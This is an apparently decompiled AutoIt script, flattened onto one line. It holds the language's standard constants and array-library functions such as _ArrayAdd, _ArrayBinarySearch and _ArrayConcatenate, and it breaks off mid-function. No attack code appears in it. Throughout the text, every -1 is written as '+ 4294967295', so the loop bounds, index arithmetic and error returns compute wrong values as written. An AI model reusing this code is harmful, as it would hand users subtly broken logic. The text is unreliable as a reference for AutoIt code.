                                        Code:GLOBAL CONST $OPT_COORDSRELATIVE = 0 GLOBAL CONST $OPT_COORDSABSOLUTE = 1 GLOBAL CONST $OPT_COORDSCLIENT = 2 GLOBAL CONST $OPT_ERRORSILENT = 0 GLOBAL CONST $OPT_ERRORFATAL = 1 GLOBAL CONST $OPT_CAPSNOSTORE = 0 GLOBAL CONST $OPT_CAPSSTORE = 1 GLOBAL CONST $OPT_MATCHSTART = 1 GLOBAL CONST $OPT_MATCHANY = 2 GLOBAL CONST $OPT_MATCHEXACT = 3 GLOBAL CONST $OPT_MATCHADVANCED = 4 GLOBAL CONST $CCS_TOP = 1 GLOBAL CONST $CCS_NOMOVEY = 2 GLOBAL CONST $CCS_BOTTOM = 3 GLOBAL CONST $CCS_NORESIZE = 4 GLOBAL CONST $CCS_NOPARENTALIGN = 8 GLOBAL CONST $CCS_NOHILITE = 16 GLOBAL CONST $CCS_ADJUSTABLE = 32 GLOBAL CONST $CCS_NODIVIDER = 64 GLOBAL CONST $CCS_VERT = 128 GLOBAL CONST $CCS_LEFT = 129 GLOBAL CONST $CCS_NOMOVEX = 130 GLOBAL CONST $CCS_RIGHT = 131 GLOBAL CONST $DT_DRIVETYPE = 1 GLOBAL CONST $DT_SSDSTATUS = 2 GLOBAL CONST $DT_BUSTYPE = 3 GLOBAL CONST $PROXY_IE = 0 GLOBAL CONST $PROXY_NONE = 1 GLOBAL CONST $PROXY_SPECIFIED = 2 GLOBAL CONST $OBJID_WINDOW = 0 GLOBAL CONST $OBJID_TITLEBAR = 4294967294 GLOBAL CONST $OBJID_SIZEGRIP = 4294967289 GLOBAL CONST $OBJID_CARET = 4294967288 GLOBAL CONST $OBJID_CURSOR = 4294967287 GLOBAL CONST $OBJID_ALERT = 4294967286 GLOBAL CONST $OBJID_SOUND = 4294967285 GLOBAL CONST $DLG_CENTERONTOP = 0 GLOBAL CONST $DLG_NOTITLE = 1 GLOBAL CONST $DLG_NOTONTOP = 2 GLOBAL CONST $DLG_TEXTLEFT = 4 GLOBAL CONST $DLG_TEXTRIGHT = 8 GLOBAL CONST $DLG_MOVEABLE = 16 GLOBAL CONST $DLG_TEXTVCENTER = 32 GLOBAL CONST $IDC_UNKNOWN = 0 GLOBAL CONST $IDC_APPSTARTING = 1 GLOBAL CONST $IDC_ARROW = 2 GLOBAL CONST $IDC_CROSS = 3 GLOBAL CONST $IDC_HAND = 32649 GLOBAL CONST $IDC_HELP = 4 GLOBAL CONST $IDC_IBEAM = 5 GLOBAL CONST $IDC_ICON = 6 GLOBAL CONST $IDC_NO = 7 GLOBAL CONST $IDC_SIZE = 8 GLOBAL CONST $IDC_SIZEALL = 9 GLOBAL CONST $IDC_SIZENESW = 10 GLOBAL CONST $IDC_SIZENS = 11 GLOBAL CONST $IDC_SIZENWSE = 12 GLOBAL CONST $IDC_SIZEWE = 13 GLOBAL CONST $IDC_UPARROW = 14 GLOBAL CONST $IDC_WAIT = 15 GLOBAL CONST $IDI_APPLICATION = 
32512 GLOBAL CONST $IDI_ASTERISK = 32516 GLOBAL CONST $IDI_EXCLAMATION = 32515 GLOBAL CONST $IDI_HAND = 32513 GLOBAL CONST $IDI_QUESTION = 32514 GLOBAL CONST $IDI_WINLOGO = 32517 GLOBAL CONST $IDI_SHIELD = 32518 GLOBAL CONST $IDI_ERROR = $IDI_HAND GLOBAL CONST $IDI_INFORMATION = $IDI_ASTERISK GLOBAL CONST $IDI_WARNING = $IDI_EXCLAMATION GLOBAL CONST $SD_LOGOFF = 0 GLOBAL CONST $SD_SHUTDOWN = 1 GLOBAL CONST $SD_REBOOT = 2 GLOBAL CONST $SD_FORCE = 4 GLOBAL CONST $SD_POWERDOWN = 8 GLOBAL CONST $SD_FORCEHUNG = 16 GLOBAL CONST $SD_STANDBY = 32 GLOBAL CONST $SD_HIBERNATE = 64 GLOBAL CONST $STDIN_CHILD = 1 GLOBAL CONST $STDOUT_CHILD = 2 GLOBAL CONST $STDERR_CHILD = 4 GLOBAL CONST $STDERR_MERGED = 8 GLOBAL CONST $STDIO_INHERIT_PARENT = 16 GLOBAL CONST $RUN_CREATE_NEW_CONSOLE = 65536 GLOBAL CONST $UBOUND_DIMENSIONS = 0 GLOBAL CONST $UBOUND_ROWS = 1 GLOBAL CONST $UBOUND_COLUMNS = 2 GLOBAL CONST $MOUSEEVENTF_ABSOLUTE = 32768 GLOBAL CONST $MOUSEEVENTF_MOVE = 1 GLOBAL CONST $MOUSEEVENTF_LEFTDOWN = 2 GLOBAL CONST $MOUSEEVENTF_LEFTUP = 4 GLOBAL CONST $MOUSEEVENTF_RIGHTDOWN = 8 GLOBAL CONST $MOUSEEVENTF_RIGHTUP = 16 GLOBAL CONST $MOUSEEVENTF_MIDDLEDOWN = 32 GLOBAL CONST $MOUSEEVENTF_MIDDLEUP = 64 GLOBAL CONST $MOUSEEVENTF_WHEEL = 2048 GLOBAL CONST $MOUSEEVENTF_XDOWN = 128 GLOBAL CONST $MOUSEEVENTF_XUP = 256 GLOBAL CONST $REG_NONE = 0 GLOBAL CONST $REG_SZ = 1 GLOBAL CONST $REG_EXPAND_SZ = 2 GLOBAL CONST $REG_BINARY = 3 GLOBAL CONST $REG_DWORD = 4 GLOBAL CONST $REG_DWORD_LITTLE_ENDIAN = 4 GLOBAL CONST $REG_DWORD_BIG_ENDIAN = 5 GLOBAL CONST $REG_LINK = 6 GLOBAL CONST $REG_MULTI_SZ = 7 GLOBAL CONST $REG_RESOURCE_LIST = 8 GLOBAL CONST $REG_FULL_RESOURCE_DESCRIPTOR = 9 GLOBAL CONST $REG_RESOURCE_REQUIREMENTS_LIST = 10 GLOBAL CONST $REG_QWORD = 11 GLOBAL CONST $REG_QWORD_LITTLE_ENDIAN = 11 GLOBAL CONST $HWND_BOTTOM = 1 GLOBAL CONST $HWND_NOTOPMOST = + 4294967294 GLOBAL CONST $HWND_TOP = 0 GLOBAL CONST $HWND_TOPMOST = + 4294967295 GLOBAL CONST $SWP_NOSIZE = 1 GLOBAL CONST $SWP_NOMOVE = 2 
GLOBAL CONST $SWP_NOZORDER = 4 GLOBAL CONST $SWP_NOREDRAW = 8 GLOBAL CONST $SWP_NOACTIVATE = 16 GLOBAL CONST $SWP_FRAMECHANGED = 32 GLOBAL CONST $SWP_DRAWFRAME = 32 GLOBAL CONST $SWP_SHOWWINDOW = 64 GLOBAL CONST $SWP_HIDEWINDOW = 128 GLOBAL CONST $SWP_NOCOPYBITS = 256 GLOBAL CONST $SWP_NOOWNERZORDER = 512 GLOBAL CONST $SWP_NOREPOSITION = 512 GLOBAL CONST $SWP_NOSENDCHANGING = 1024 GLOBAL CONST $SWP_DEFERERASE = 8192 GLOBAL CONST $SWP_ASYNCWINDOWPOS = 16384 GLOBAL CONST $KEYWORD_DEFAULT = 1 GLOBAL CONST $KEYWORD_NULL = 2 GLOBAL CONST $DECLARED_LOCAL = + 4294967295 GLOBAL CONST $DECLARED_UNKNOWN = 0 GLOBAL CONST $DECLARED_GLOBAL = 1 GLOBAL CONST $ASSIGN_CREATE = 0 GLOBAL CONST $ASSIGN_FORCELOCAL = 1 GLOBAL CONST $ASSIGN_FORCEGLOBAL = 2 GLOBAL CONST $ASSIGN_EXISTFAIL = 4 GLOBAL CONST $BI_ENABLE = 0 GLOBAL CONST $BI_DISABLE = 1 GLOBAL CONST $BREAK_ENABLE = 1 GLOBAL CONST $BREAK_DISABLE = 0 GLOBAL CONST $CDTRAY_OPEN = "open" GLOBAL CONST $CDTRAY_CLOSED = "closed" GLOBAL CONST $SEND_DEFAULT = 0 GLOBAL CONST $SEND_RAW = 1 GLOBAL CONST $DIR_DEFAULT = 0 GLOBAL CONST $DIR_EXTENDED = 1 GLOBAL CONST $DIR_NORECURSE = 2 GLOBAL CONST $DIR_REMOVE = 1 GLOBAL CONST $DT_ALL = "ALL" GLOBAL CONST $DT_CDROM = "CDROM" GLOBAL CONST $DT_REMOVABLE = "REMOVABLE" GLOBAL CONST $DT_FIXED = "FIXED" GLOBAL CONST $DT_NETWORK = "NETWORK" GLOBAL CONST $DT_RAMDISK = "RAMDISK" GLOBAL CONST $DT_UNKNOWN = "UNKNOWN" GLOBAL CONST $DT_UNDEFINED = 1 GLOBAL CONST $DT_FAT = "FAT" GLOBAL CONST $DT_FAT32 = "FAT32" GLOBAL CONST $DT_EXFAT = "exFAT" GLOBAL CONST $DT_NTFS = "NTFS" GLOBAL CONST $DT_NWFS = "NWFS" GLOBAL CONST $DT_CDFS = "CDFS" GLOBAL CONST $DT_UDF = "UDF" GLOBAL CONST $DMA_DEFAULT = 0 GLOBAL CONST $DMA_PERSISTENT = 1 GLOBAL CONST $DMA_AUTHENTICATION = 8 GLOBAL CONST $DS_UNKNOWN = "UNKNOWN" GLOBAL CONST $DS_READY = "READY" GLOBAL CONST $DS_NOTREADY = "NOTREADY" GLOBAL CONST $DS_INVALID = "INVALID" GLOBAL CONST $MOUSE_CLICK_LEFT = "left" GLOBAL CONST $MOUSE_CLICK_RIGHT = "right" GLOBAL CONST 
$MOUSE_CLICK_MIDDLE = "middle" GLOBAL CONST $MOUSE_CLICK_MAIN = "main" GLOBAL CONST $MOUSE_CLICK_MENU = "menu" GLOBAL CONST $MOUSE_CLICK_PRIMARY = "primary" GLOBAL CONST $MOUSE_CLICK_SECONDARY = "secondary" GLOBAL CONST $MOUSE_WHEEL_UP = "up" GLOBAL CONST $MOUSE_WHEEL_DOWN = "down" GLOBAL CONST $NUMBER_AUTO = 0 GLOBAL CONST $NUMBER_32BIT = 1 GLOBAL CONST $NUMBER_64BIT = 2 GLOBAL CONST $NUMBER_DOUBLE = 3 GLOBAL CONST $OBJ_NAME = 1 GLOBAL CONST $OBJ_STRING = 2 GLOBAL CONST $OBJ_PROGID = 3 GLOBAL CONST $OBJ_FILE = 4 GLOBAL CONST $OBJ_MODULE = 5 GLOBAL CONST $OBJ_CLSID = 6 GLOBAL CONST $OBJ_IID = 7 GLOBAL CONST $EXITCLOSE_NORMAL = 0 GLOBAL CONST $EXITCLOSE_BYEXIT = 1 GLOBAL CONST $EXITCLOSE_BYCLICK = 2 GLOBAL CONST $EXITCLOSE_BYLOGOFF = 3 GLOBAL CONST $EXITCLOSE_BYSUTDOWN = 4 GLOBAL CONST $PROCESS_STATS_MEMORY = 0 GLOBAL CONST $PROCESS_STATS_IO = 1 GLOBAL CONST $PROCESS_LOW = 0 GLOBAL CONST $PROCESS_BELOWNORMAL = 1 GLOBAL CONST $PROCESS_NORMAL = 2 GLOBAL CONST $PROCESS_ABOVENORMAL = 3 GLOBAL CONST $PROCESS_HIGH = 4 GLOBAL CONST $PROCESS_REALTIME = 5 GLOBAL CONST $RUN_LOGON_NOPROFILE = 0 GLOBAL CONST $RUN_LOGON_PROFILE = 1 GLOBAL CONST $RUN_LOGON_NETWORK = 2 GLOBAL CONST $RUN_LOGON_INHERIT = 4 GLOBAL CONST $SOUND_NOWAIT = 0 GLOBAL CONST $SOUND_WAIT = 1 GLOBAL CONST $SHEX_OPEN = "open" GLOBAL CONST $SHEX_EDIT = "edit" GLOBAL CONST $SHEX_PRINT = "print" GLOBAL CONST $SHEX_PROPERTIES = "properties" GLOBAL CONST $TCP_DATA_DEFAULT = 0 GLOBAL CONST $TCP_DATA_BINARY = 1 GLOBAL CONST $UDP_OPEN_DEFAULT = 0 GLOBAL CONST $UDP_OPEN_BROADCAST = 1 GLOBAL CONST $UDP_DATA_DEFAULT = 0 GLOBAL CONST $UDP_DATA_BINARY = 1 GLOBAL CONST $UDP_DATA_ARRAY = 2 GLOBAL CONST $TIP_NOICON = 0 GLOBAL CONST $TIP_INFOICON = 1 GLOBAL CONST $TIP_WARNINGICON = 2 GLOBAL CONST $TIP_ERRORICON = 3 GLOBAL CONST $TIP_BALLOON = 1 GLOBAL CONST $TIP_CENTER = 2 GLOBAL CONST $TIP_FORCEVISIBLE = 4 GLOBAL CONST $WINDOWS_NOONTOP = 0 GLOBAL CONST $WINDOWS_ONTOP = 1 GLOBAL CONST $MB_OK = 0 GLOBAL CONST $MB_OKCANCEL = 1 
GLOBAL CONST $MB_ABORTRETRYIGNORE = 2 GLOBAL CONST $MB_YESNOCANCEL = 3 GLOBAL CONST $MB_YESNO = 4 GLOBAL CONST $MB_RETRYCANCEL = 5 GLOBAL CONST $MB_CANCELTRYCONTINUE = 6 GLOBAL CONST $MB_HELP = 16384 GLOBAL CONST $MB_ICONSTOP = 16 GLOBAL CONST $MB_ICONERROR = 16 GLOBAL CONST $MB_ICONHAND = 16 GLOBAL CONST $MB_ICONQUESTION = 32 GLOBAL CONST $MB_ICONEXCLAMATION = 48 GLOBAL CONST $MB_ICONWARNING = 48 GLOBAL CONST $MB_ICONINFORMATION = 64 GLOBAL CONST $MB_ICONASTERISK = 64 GLOBAL CONST $MB_USERICON = 128 GLOBAL CONST $MB_DEFBUTTON1 = 0 GLOBAL CONST $MB_DEFBUTTON2 = 256 GLOBAL CONST $MB_DEFBUTTON3 = 512 GLOBAL CONST $MB_DEFBUTTON4 = 768 GLOBAL CONST $MB_APPLMODAL = 0 GLOBAL CONST $MB_SYSTEMMODAL = 4096 GLOBAL CONST $MB_TASKMODAL = 8192 GLOBAL CONST $MB_DEFAULT_DESKTOP_ONLY = 131072 GLOBAL CONST $MB_RIGHT = 524288 GLOBAL CONST $MB_RTLREADING = 1048576 GLOBAL CONST $MB_SETFOREGROUND = 65536 GLOBAL CONST $MB_TOPMOST = 262144 GLOBAL CONST $MB_SERVICE_NOTIFICATION = 2097152 GLOBAL CONST $MB_RIGHTJUSTIFIED = $MB_RIGHT GLOBAL CONST $IDTIMEOUT = + 4294967295 GLOBAL CONST $IDOK = 1 GLOBAL CONST $IDCANCEL = 2 GLOBAL CONST $IDABORT = 3 GLOBAL CONST $IDRETRY = 4 GLOBAL CONST $IDIGNORE = 5 GLOBAL CONST $IDYES = 6 GLOBAL CONST $IDNO = 7 GLOBAL CONST $IDCLOSE = 8 GLOBAL CONST $IDHELP = 9 GLOBAL CONST $IDTRYAGAIN = 10 GLOBAL CONST $IDCONTINUE = 11 GLOBAL CONST $STR_NOCASESENSE = 0 GLOBAL CONST $STR_CASESENSE = 1 GLOBAL CONST $STR_NOCASESENSEBASIC = 2 GLOBAL CONST $STR_STRIPLEADING = 1 GLOBAL CONST $STR_STRIPTRAILING = 2 GLOBAL CONST $STR_STRIPSPACES = 4 GLOBAL CONST $STR_STRIPALL = 8 GLOBAL CONST $STR_CHRSPLIT = 0 GLOBAL CONST $STR_ENTIRESPLIT = 1 GLOBAL CONST $STR_NOCOUNT = 2 GLOBAL CONST $STR_REGEXPMATCH = 0 GLOBAL CONST $STR_REGEXPARRAYMATCH = 1 GLOBAL CONST $STR_REGEXPARRAYFULLMATCH = 2 GLOBAL CONST $STR_REGEXPARRAYGLOBALMATCH = 3 GLOBAL CONST $STR_REGEXPARRAYGLOBALFULLMATCH = 4 GLOBAL CONST $STR_ENDISSTART = 0 GLOBAL CONST $STR_ENDNOTSTART = 1 GLOBAL CONST $SB_ANSI = 1 GLOBAL 
CONST $SB_UTF16LE = 2 GLOBAL CONST $SB_UTF16BE = 3 GLOBAL CONST $SB_UTF8 = 4 GLOBAL CONST $SE_UTF16 = 0 GLOBAL CONST $SE_ANSI = 1 GLOBAL CONST $SE_UTF8 = 2 GLOBAL CONST $STR_UTF16 = 0 GLOBAL CONST $STR_UCS2 = 1 GLOBAL ENUM $ARRAYFILL_FORCE_DEFAULT , $ARRAYFILL_FORCE_SINGLEITEM , $ARRAYFILL_FORCE_INT , $ARRAYFILL_FORCE_NUMBER , $ARRAYFILL_FORCE_PTR , $ARRAYFILL_FORCE_HWND , $ARRAYFILL_FORCE_STRING GLOBAL ENUM $ARRAYUNIQUE_NOCOUNT , $ARRAYUNIQUE_COUNT GLOBAL ENUM $ARRAYUNIQUE_AUTO , $ARRAYUNIQUE_FORCE32 , $ARRAYUNIQUE_FORCE64 , $ARRAYUNIQUE_MATCH , $ARRAYUNIQUE_DISTINCT FUNC _ARRAYADD (BYREF $AARRAY , $VVALUE , $ISTART = 0 , $SDELIM_ITEM = "|" , $SDELIM_ROW = @CRLF , $IFORCE = $ARRAYFILL_FORCE_DEFAULT ) IF $ISTART = DEFAULT THEN $ISTART = 0 IF $SDELIM_ITEM = DEFAULT THEN $SDELIM_ITEM = "|" IF $SDELIM_ROW = DEFAULT THEN $SDELIM_ROW = @CRLF IF $IFORCE = DEFAULT THEN $IFORCE = $ARRAYFILL_FORCE_DEFAULT IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) LOCAL $HDATATYPE = 0 SWITCH $IFORCE CASE $ARRAYFILL_FORCE_INT $HDATATYPE = INT CASE $ARRAYFILL_FORCE_NUMBER $HDATATYPE = NUMBER CASE $ARRAYFILL_FORCE_PTR $HDATATYPE = PTR CASE $ARRAYFILL_FORCE_HWND $HDATATYPE = HWND CASE $ARRAYFILL_FORCE_STRING $HDATATYPE = STRING ENDSWITCH SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF $IFORCE = $ARRAYFILL_FORCE_SINGLEITEM THEN REDIM $AARRAY [$IDIM_1 + 1 ] $AARRAY [$IDIM_1 ] = $VVALUE RETURN $IDIM_1 ENDIF IF ISARRAY ($VVALUE ) THEN IF UBOUND ($VVALUE , $UBOUND_DIMENSIONS ) <> 1 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) $HDATATYPE = 0 ELSE LOCAL $ATMP = STRINGSPLIT ($VVALUE , $SDELIM_ITEM , $STR_NOCOUNT + $STR_ENTIRESPLIT ) IF UBOUND ($ATMP , $UBOUND_ROWS ) = 1 THEN $ATMP [0 ] = $VVALUE ENDIF $VVALUE = $ATMP ENDIF LOCAL $IADD = UBOUND ($VVALUE , $UBOUND_ROWS ) REDIM $AARRAY [$IDIM_1 + $IADD ] FOR $I = 0 TO $IADD + 4294967295 IF ISFUNC ($HDATATYPE ) THEN $AARRAY [$IDIM_1 + $I ] = $HDATATYPE ($VVALUE [$I ] ) 
ELSE $AARRAY [$IDIM_1 + $I ] = $VVALUE [$I ] ENDIF NEXT RETURN $IDIM_1 + $IADD + 4294967295 CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) IF $ISTART < 0 OR $ISTART > $IDIM_2 + 4294967295 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) LOCAL $IVALDIM_1 , $IVALDIM_2 = 0 , $ICOLCOUNT IF ISARRAY ($VVALUE ) THEN IF UBOUND ($VVALUE , $UBOUND_DIMENSIONS ) <> 2 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) $IVALDIM_1 = UBOUND ($VVALUE , $UBOUND_ROWS ) $IVALDIM_2 = UBOUND ($VVALUE , $UBOUND_COLUMNS ) $HDATATYPE = 0 ELSE LOCAL $ASPLIT_1 = STRINGSPLIT ($VVALUE , $SDELIM_ROW , $STR_NOCOUNT + $STR_ENTIRESPLIT ) $IVALDIM_1 = UBOUND ($ASPLIT_1 , $UBOUND_ROWS ) LOCAL $ATMP [$IVALDIM_1 ] [0 ] , $ASPLIT_2 FOR $I = 0 TO $IVALDIM_1 + 4294967295 $ASPLIT_2 = STRINGSPLIT ($ASPLIT_1 [$I ] , $SDELIM_ITEM , $STR_NOCOUNT + $STR_ENTIRESPLIT ) $ICOLCOUNT = UBOUND ($ASPLIT_2 ) IF $ICOLCOUNT > $IVALDIM_2 THEN $IVALDIM_2 = $ICOLCOUNT REDIM $ATMP [$IVALDIM_1 ] [$IVALDIM_2 ] ENDIF FOR $J = 0 TO $ICOLCOUNT + 4294967295 $ATMP [$I ] [$J ] = $ASPLIT_2 [$J ] NEXT NEXT $VVALUE = $ATMP ENDIF IF UBOUND ($VVALUE , $UBOUND_COLUMNS ) + $ISTART > UBOUND ($AARRAY , $UBOUND_COLUMNS ) THEN RETURN SETERROR (3 , 0 , + 4294967295 ) REDIM $AARRAY [$IDIM_1 + $IVALDIM_1 ] [$IDIM_2 ] FOR $IWRITETO_INDEX = 0 TO $IVALDIM_1 + 4294967295 FOR $J = 0 TO $IDIM_2 + 4294967295 IF $J < $ISTART THEN $AARRAY [$IWRITETO_INDEX + $IDIM_1 ] [$J ] = "" ELSEIF $J - $ISTART > $IVALDIM_2 + 4294967295 THEN $AARRAY [$IWRITETO_INDEX + $IDIM_1 ] [$J ] = "" ELSE IF ISFUNC ($HDATATYPE ) THEN $AARRAY [$IWRITETO_INDEX + $IDIM_1 ] [$J ] = $HDATATYPE ($VVALUE [$IWRITETO_INDEX ] [$J - $ISTART ] ) ELSE $AARRAY [$IWRITETO_INDEX + $IDIM_1 ] [$J ] = $VVALUE [$IWRITETO_INDEX ] [$J - $ISTART ] ENDIF ENDIF NEXT NEXT CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 ENDFUNC FUNC _ARRAYBINARYSEARCH (CONST BYREF $AARRAY , $VVALUE , $ISTART = 0 , $IEND = 0 , $ICOLUMN = 0 ) IF $ISTART = 
DEFAULT THEN $ISTART = 0 IF $IEND = DEFAULT THEN $IEND = 0 IF $ICOLUMN = DEFAULT THEN $ICOLUMN = 0 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) IF $IDIM_1 = 0 THEN RETURN SETERROR (6 , 0 , + 4294967295 ) IF $IEND < 1 OR $IEND > $IDIM_1 + 4294967295 THEN $IEND = $IDIM_1 + 4294967295 IF $ISTART < 0 THEN $ISTART = 0 IF $ISTART > $IEND THEN RETURN SETERROR (4 , 0 , + 4294967295 ) LOCAL $IMID = INT (($IEND + $ISTART ) / 2 ) SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF $AARRAY [$ISTART ] > $VVALUE OR $AARRAY [$IEND ] < $VVALUE THEN RETURN SETERROR (2 , 0 , + 4294967295 ) WHILE $ISTART <= $IMID AND $VVALUE <> $AARRAY [$IMID ] IF $VVALUE < $AARRAY [$IMID ] THEN $IEND = $IMID + 4294967295 ELSE $ISTART = $IMID + 1 ENDIF $IMID = INT (($IEND + $ISTART ) / 2 ) WEND IF $ISTART > $IEND THEN RETURN SETERROR (3 , 0 , + 4294967295 ) CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 IF $ICOLUMN < 0 OR $ICOLUMN > $IDIM_2 THEN RETURN SETERROR (7 , 0 , + 4294967295 ) IF $AARRAY [$ISTART ] [$ICOLUMN ] > $VVALUE OR $AARRAY [$IEND ] [$ICOLUMN ] < $VVALUE THEN RETURN SETERROR (2 , 0 , + 4294967295 ) WHILE $ISTART <= $IMID AND $VVALUE <> $AARRAY [$IMID ] [$ICOLUMN ] IF $VVALUE < $AARRAY [$IMID ] [$ICOLUMN ] THEN $IEND = $IMID + 4294967295 ELSE $ISTART = $IMID + 1 ENDIF $IMID = INT (($IEND + $ISTART ) / 2 ) WEND IF $ISTART > $IEND THEN RETURN SETERROR (3 , 0 , + 4294967295 ) CASE ELSE RETURN SETERROR (5 , 0 , + 4294967295 ) ENDSWITCH RETURN $IMID ENDFUNC FUNC _ARRAYCOLDELETE (BYREF $AARRAY , $ICOLUMN , $BCONVERT = FALSE ) IF $BCONVERT = DEFAULT THEN $BCONVERT = FALSE IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) <> 2 THEN RETURN SETERROR (2 , 0 , + 4294967295 ) LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) SWITCH $IDIM_2 CASE 2 IF $ICOLUMN < 0 OR $ICOLUMN > 1 THEN 
RETURN SETERROR (3 , 0 , + 4294967295 ) IF $BCONVERT THEN LOCAL $ATEMPARRAY [$IDIM_1 ] FOR $I = 0 TO $IDIM_1 + 4294967295 $ATEMPARRAY [$I ] = $AARRAY [$I ] [(NOT $ICOLUMN ) ] NEXT $AARRAY = $ATEMPARRAY ELSE CONTINUECASE ENDIF CASE ELSE IF $ICOLUMN < 0 OR $ICOLUMN > $IDIM_2 + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) FOR $I = 0 TO $IDIM_1 + 4294967295 FOR $J = $ICOLUMN TO $IDIM_2 + 4294967294 $AARRAY [$I ] [$J ] = $AARRAY [$I ] [$J + 1 ] NEXT NEXT REDIM $AARRAY [$IDIM_1 ] [$IDIM_2 + 4294967295 ] ENDSWITCH RETURN UBOUND ($AARRAY , $UBOUND_COLUMNS ) ENDFUNC FUNC _ARRAYCOLINSERT (BYREF $AARRAY , $ICOLUMN ) IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 LOCAL $ATEMPARRAY [$IDIM_1 ] [2 ] SWITCH $ICOLUMN CASE 0 , 1 FOR $I = 0 TO $IDIM_1 + 4294967295 $ATEMPARRAY [$I ] [(NOT $ICOLUMN ) ] = $AARRAY [$I ] NEXT CASE ELSE RETURN SETERROR (3 , 0 , + 4294967295 ) ENDSWITCH $AARRAY = $ATEMPARRAY CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) IF $ICOLUMN < 0 OR $ICOLUMN > $IDIM_2 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) REDIM $AARRAY [$IDIM_1 ] [$IDIM_2 + 1 ] FOR $I = 0 TO $IDIM_1 + 4294967295 FOR $J = $IDIM_2 TO $ICOLUMN + 1 STEP + 4294967295 $AARRAY [$I ] [$J ] = $AARRAY [$I ] [$J + 4294967295 ] NEXT $AARRAY [$I ] [$ICOLUMN ] = "" NEXT CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN UBOUND ($AARRAY , $UBOUND_COLUMNS ) ENDFUNC FUNC _ARRAYCOMBINATIONS (CONST BYREF $AARRAY , $ISET , $SDELIMITER = "" ) IF $SDELIMITER = DEFAULT THEN $SDELIMITER = "" IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , 0 ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) <> 1 THEN RETURN SETERROR (2 , 0 , 0 ) LOCAL $IN = UBOUND ($AARRAY ) LOCAL $IR = $ISET LOCAL $AIDX [$IR ] FOR $I = 0 TO $IR + 4294967295 $AIDX [$I ] = $I NEXT LOCAL $ITOTAL = __ARRAY_COMBINATIONS ($IN , $IR ) LOCAL $ILEFT = $ITOTAL LOCAL $ARESULT [$ITOTAL + 1 ] 
$ARESULT [0 ] = $ITOTAL LOCAL $ICOUNT = 1 WHILE $ILEFT > 0 __ARRAY_GETNEXT ($IN , $IR , $ILEFT , $ITOTAL , $AIDX ) FOR $I = 0 TO $ISET + 4294967295 $ARESULT [$ICOUNT ] &= $AARRAY [$AIDX [$I ] ] & $SDELIMITER NEXT IF $SDELIMITER <> "" THEN $ARESULT [$ICOUNT ] = STRINGTRIMRIGHT ($ARESULT [$ICOUNT ] , 1 ) $ICOUNT += 1 WEND RETURN $ARESULT ENDFUNC FUNC _ARRAYCONCATENATE (BYREF $AARRAYTARGET , CONST BYREF $AARRAYSOURCE , $ISTART = 0 ) IF $ISTART = DEFAULT THEN $ISTART = 0 IF NOT ISARRAY ($AARRAYTARGET ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) IF NOT ISARRAY ($AARRAYSOURCE ) THEN RETURN SETERROR (2 , 0 , + 4294967295 ) LOCAL $IDIM_TOTAL_TGT = UBOUND ($AARRAYTARGET , $UBOUND_DIMENSIONS ) LOCAL $IDIM_TOTAL_SRC = UBOUND ($AARRAYSOURCE , $UBOUND_DIMENSIONS ) LOCAL $IDIM_1_TGT = UBOUND ($AARRAYTARGET , $UBOUND_ROWS ) LOCAL $IDIM_1_SRC = UBOUND ($AARRAYSOURCE , $UBOUND_ROWS ) IF $ISTART < 0 OR $ISTART > $IDIM_1_SRC + 4294967295 THEN RETURN SETERROR (6 , 0 , + 4294967295 ) SWITCH $IDIM_TOTAL_TGT CASE 1 IF $IDIM_TOTAL_SRC <> 1 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) REDIM $AARRAYTARGET [$IDIM_1_TGT + $IDIM_1_SRC - $ISTART ] FOR $I = $ISTART TO $IDIM_1_SRC + 4294967295 $AARRAYTARGET [$IDIM_1_TGT + $I - $ISTART ] = $AARRAYSOURCE [$I ] NEXT CASE 2 IF $IDIM_TOTAL_SRC <> 2 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) LOCAL $IDIM_2_TGT = UBOUND ($AARRAYTARGET , $UBOUND_COLUMNS ) IF UBOUND ($AARRAYSOURCE , $UBOUND_COLUMNS ) <> $IDIM_2_TGT THEN RETURN SETERROR (5 , 0 , + 4294967295 ) REDIM $AARRAYTARGET [$IDIM_1_TGT + $IDIM_1_SRC - $ISTART ] [$IDIM_2_TGT ] FOR $I = $ISTART TO $IDIM_1_SRC + 4294967295 FOR $J = 0 TO $IDIM_2_TGT + 4294967295 $AARRAYTARGET [$IDIM_1_TGT + $I - $ISTART ] [$J ] = $AARRAYSOURCE [$I ] [$J ] NEXT NEXT CASE ELSE RETURN SETERROR (3 , 0 , + 4294967295 ) ENDSWITCH RETURN 